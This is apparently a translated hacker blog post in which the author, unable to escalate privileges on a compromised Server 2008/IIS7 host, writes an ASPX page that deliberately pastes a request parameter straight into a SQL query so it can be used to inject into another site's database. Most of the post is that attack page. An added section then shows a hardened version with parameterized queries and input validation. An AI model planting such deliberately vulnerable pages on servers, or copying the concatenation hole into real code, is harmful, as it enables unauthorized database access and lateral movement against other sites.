Yesterday 4z1 and I were looking at a site. Privilege escalation was very hard; we spent a full 5 hours on it with no result. Server 2008 + IIS7, no sa, no root, no services of any kind...
In the process we actually used an ASPX page that constructs an injection to get across to the other site. I found a pile of code online and not one of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 ASPX constructed injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
    // Runs at page init; AutoEventWireup (on by default for C# pages) binds it
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // "连接名" is the name of the connection string entry in web.config
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();
        string i = this.Page.Request.Params["xxser"]; // the parameter, passed as ?xxser=1

        // The raw parameter is concatenated straight into the query text; this is the point the page is built around
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery();
        // Echo the parameter and the return value of ExecuteNonQuery back into the response
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
    </script>
    </div>
    </form>
</body>
</html>
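For contrast, here is the same handler written the way a defender would expect it: the input is validated as an integer, the query is parameterized, and the echoed value is HTML-encoded, so neither the SQL concatenation point nor the reflected output above remains. This is an added example, not code from the original post; it assumes the same web.config connection-string name, and the table and column names are placeholders.

```csharp
// Added example (not from the original post): hardened form of the handler above.
// Assumes the same "连接名" connection-string entry; [Orders] and [Id] are placeholder names.
void Page_Init(object sender, EventArgs e)
{
    int id;
    // Reject anything that is not an integer before it gets anywhere near SQL
    if (!int.TryParse(Request.Params["xxser"], out id))
    {
        Response.StatusCode = 400;
        Response.Write("invalid parameter");
        return;
    }

    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    using (var conn = new System.Data.SqlClient.SqlConnection(cs))
    using (var command = new System.Data.SqlClient.SqlCommand(
               "select count(*) from [Orders] where [Id] = @id", conn))
    {
        // The value travels as a typed parameter, never as part of the SQL text
        command.Parameters.Add("@id", System.Data.SqlDbType.Int).Value = id;
        conn.Open();
        int count = (int)command.ExecuteScalar();

        // Encode before reflecting user-derived data into the page
        Response.Write(Server.HtmlEncode(id.ToString()) + "\n");
        Response.Write(count);
    }
}
```

The `using` blocks also dispose the connection and command even when the query throws, which the original's `conn.Close()` after an exception would not.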